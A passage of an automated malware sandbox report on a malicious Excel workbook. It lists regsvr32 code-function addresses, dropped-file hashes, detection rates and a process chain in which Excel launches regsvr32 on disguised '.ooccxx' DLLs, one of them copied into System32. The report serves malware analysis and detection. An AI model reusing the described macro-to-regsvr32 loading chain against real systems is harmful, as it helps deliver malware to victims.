                      Source: C:\Windows\System32\regsvr32.exe; Code function: 8_2_100073A4, 8_2_1003B0D0, 8_2_1004E0F0, 8_2_10044160, 8_2_100491A0, 8_2_10048210, 8_2_100102D4, 8_2_1004B340, 8_2_1001C3CC, 8_2_1003E540, 8_2_1003B5D0, 8_2_1003F650, 8_2_10031730, 8_2_10044730, 8_2_100547A0, 8_2_1003D830, 8_2_10034910, 8_2_1002C9A8, 8_2_100449B0, 8_2_1004E9C0, 8_2_10048A10, 8_2_10031A60, 8_2_10018A70, 8_2_1003CC40, 8_2_10025C50, 8_2_10027C6C, 8_2_10037CB0, 8_2_10043CC0, 8_2_10001CC8, 8_2_10021CD0, 8_2_10013CFC, 8_2_10016D48, 8_2_10054D70, 8_2_1003DD80, 8_2_10034DC0, 8_2_1000FDC8, 8_2_10038DF0, 8_2_10033EB0, 8_2_1004EED0, 8_2_10040FB0, 8_2_1004BFF0
                      Source: C:\Windows\System32\regsvr32.exe; Code function: 8_2_001F0000
                      Source: C:\Windows\System32\regsvr32.exe; Code function: 8_2_00000001800018F0, 8_2_0000000180009AC0, 8_2_0000000180003B78, 8_2_00000001800143B4, 8_2_000000018002AC7C, 8_2_000000018000DC7C, 8_2_00000001800184BC, 8_2_000000018001A788, 8_2_00000001800247AC, 8_2_000000018001D7F8, 8_2_000000018000C800, 8_2_000000018002B814, 8_2_0000000180017824, 8_2_0000000180003824, 8_2_000000018002803C, 8_2_0000000180023840, 8_2_000000018001B058, 8_2_000000018000D87C, 8_2_00000001800098AC, 8_2_00000001800168B0, 8_2_00000001800078B4, 8_2_00000001800190BC, 8_2_000000018002B0C4, 8_2_00000001800040EC, 8_2_00000001800288F8, 8_2_0000000180021918, 8_2_0000000180004918, 8_2_000000018000C930, 8_2_0000000180025938, 8_2_000000018000F138, 8_2_000000018000E93C, 8_2_000000018001D150, 8_2_0000000180022158, 8_2_0000000180015958, 8_2_000000018001A170, 8_2_0000000180003970, 8_2_000000018001298D, 8_2_0000000180011194, 8_2_0000000180029198, 8_2_000000018000A198, 8_2_00000001800031C4, 8_2_000000018000C1E0, 8_2_000000018000421C, 8_2_0000000180023228, 8_2_000000018001CA34, 8_2_000000018001DA34, 8_2_000000018001EA38, 8_2_000000018002B23C, 8_2_000000018002A244, 8_2_000000018000D250, 8_2_0000000180027A68, 8_2_0000000180002A6C, 8_2_0000000180014274, 8_2_0000000180012288, 8_2_0000000180012AA6, 8_2_00000001800122C8, 8_2_00000001800072CC, 8_2_0000000180006ADC, 8_2_00000001800012F0, 8_2_000000018000FB04, 8_2_000000018001E30C, 8_2_000000018001531C, 8_2_000000018000A31C, 8_2_0000000180004B50, 8_2_0000000180029360, 8_2_0000000180017B68, 8_2_000000018002539C, 8_2_00000001800033A8, 8_2_00000001800233B0, 8_2_00000001800243B8, 8_2_0000000180006BBC, 8_2_000000018001FBD8, 8_2_00000001800043F4, 8_2_000000018000C3F4, 8_2_000000018001DC00, 8_2_000000018001EC08, 8_2_0000000180007418, 8_2_0000000180025C1C, 8_2_000000018000A42C, 8_2_000000018000E42C, 8_2_0000000180028C38, 8_2_0000000180019C4C, 8_2_000000018000145C, 8_2_0000000180002480, 8_2_0000000180020490, 8_2_00000001800164B0, 8_2_0000000180017CC0, 8_2_0000000180026CD0, 8_2_000000018000BCD8, 8_2_00000001800114E0, 8_2_00000001800154EC, 8_2_000000018001FD00, 8_2_000000018002A518, 8_2_0000000180020D20, 8_2_000000018001A524, 8_2_000000018000D52C, 8_2_0000000180010D54, 8_2_0000000180002D54, 8_2_000000018002B55C, 8_2_0000000180004D70, 8_2_0000000180024D84, 8_2_000000018002358C, 8_2_0000000180029590, 8_2_0000000180021594, 8_2_000000018001D5B0, 8_2_0000000180027DB8, 8_2_000000018001B5C4, 8_2_000000018001FDF4, 8_2_000000018000F60C, 8_2_000000018001E61C, 8_2_0000000180007620, 8_2_000000018000BE20, 8_2_000000018001DE2C, 8_2_0000000180023E4C, 8_2_0000000180001650, 8_2_000000018002765C, 8_2_000000018000EE5C, 8_2_0000000180015E70, 8_2_0000000180017E74, 8_2_000000018000FE84, 8_2_00000001800056BC, 8_2_000000018002B6C0, 8_2_000000018001C6CC, 8_2_0000000180020ED4, 8_2_00000001800116DC, 8_2_00000001800166E8, 8_2_00000001800036FC, 8_2_000000018000D704, 8_2_0000000180015714, 8_2_000000018000E720, 8_2_0000000180024F30, 8_2_0000000180001744, 8_2_0000000180018764, 8_2_0000000180028768, 8_2_0000000180010F74, 8_2_0000000180018F80, 8_2_000000018002A784, 8_2_0000000180016F84, 8_2_00000001800027B8, 8_2_0000000180026FBC, 8_2_0000000180012FC8, 8_2_000000018001FFD8, 8_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exe; Code function: 9_2_001B0000
                      Source: C:\Windows\System32\regsvr32.exe; Code function: 9_2_0000000180025C1C, 9_2_0000000180019C4C, 9_2_0000000180015E70, 9_2_000000018000DC7C, 9_2_0000000180008688, 9_2_00000001800078B4, 9_2_00000001800058C0, 9_2_00000001800018F0, 9_2_00000001800132FC, 9_2_0000000180009D2C, 9_2_0000000180022334, 9_2_0000000180002D54, 9_2_0000000180003B78, 9_2_000000018001A788, 9_2_000000018001D5B0, 9_2_00000001800143B4, 9_2_000000018001FDF4, 9_2_00000001800043F4, 9_2_000000018000C3F4, 9_2_000000018001D7F8, 9_2_000000018001DC00, 9_2_000000018000C800, 9_2_000000018001EC08, 9_2_000000018000F60C, 9_2_000000018002B814, 9_2_0000000180007418, 9_2_000000018001E61C, 9_2_000000018000421C, 9_2_0000000180007620, 9_2_000000018000BE20, 9_2_0000000180017824, 9_2_0000000180003824, 9_2_0000000180023228, 9_2_0000000180010628, 9_2_000000018001DE2C, 9_2_000000018000A42C, 9_2_000000018000E42C, 9_2_000000018001CA34, 9_2_000000018001DA34, 9_2_0000000180028C38, 9_2_000000018001EA38, 9_2_000000018002803C, 9_2_000000018002B23C, 9_2_0000000180011C3C, 9_2_0000000180023840, 9_2_000000018002A244, 9_2_0000000180027448, 9_2_0000000180023E4C, 9_2_0000000180001650, 9_2_000000018000D250, 9_2_000000018001B058, 9_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002AA74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D87C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029094
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800164B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026AB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027344
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028F8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_002E0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180025C1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015E70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000DC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180008688
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800078B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800058C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800018F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800132FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180009D2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180022334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D5B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800143B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FDF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800043F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C3F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D7F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DC00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C800
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001EC08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000F60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B814
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180007418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001E61C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000421C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180007620
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BE20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DE2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001CA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028C38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001EA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002803C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B23C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180011C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027448
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023E4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180019C4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180001650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001B058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180013A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002AA74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D87C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029094
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800164B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026AB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027344
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028F8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C1E0
                      Source: 4470_02112022.xls | Macro extractor: Sheet name: Sheet6
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\oxnv4.ooccxx FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                      Source: Joe Sandbox View | Dropped File: C:\Windows\System32\XXKTOC\CASBb.dll (copy) FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                      Source: 4470_02112022.xls | ReversingLabs: Detection: 80%
                      Source: 4470_02112022.xls | Virustotal: Detection: 67%
                      Source: 4470_02112022.xls | Metadefender: Detection: 31%
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
                      Source: unknown | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\XXKTOC\CASBb.dll
                      Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\FJW3SUUT.txt
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR6315.tmp
                      Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@12/10@4/50
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                      Source: 4470_02112022.xls | OLE indicator, Workbook stream: true
                      Source: 4470_02112022.xls.0.dr | OLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_0000000180009D2C CloseHandle,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_1001B1B0 FindResourceA,LoadResource,LockResource,FreeResource,
                      Source: Window Recorder | Window detected: More than 3 window changes detected
